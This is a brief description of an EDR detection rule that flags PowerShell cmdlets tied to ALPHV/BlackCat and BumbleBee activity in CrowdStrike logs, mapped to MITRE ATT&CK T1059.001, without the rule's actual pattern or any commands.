This detection rule identifies the usage of PowerShell cmdlets that are associated with known malicious activities and threat actors, specifically targeting cmdlets linked to groups such as ALPHV/BlackCat and BumbleBee. The rule operates on the CrowdStrike EDR log data, monitoring for malicious cmdlet executions within the last two hours on Windows platforms. It utilizes a regular expression to match any of a wide array of cmdlets that are commonly exploited in cyberattacks, including but not limited to persistence mechanisms and credential dumping techniques. The rule encompasses various atomic tests mapped to the MITRE ATT&CK framework, specifically focusing on T1059.001 (PowerShell) execution techniques. This proactive detection assists in identifying potential threats as soon as they are executed, thereby enabling rapid incident response.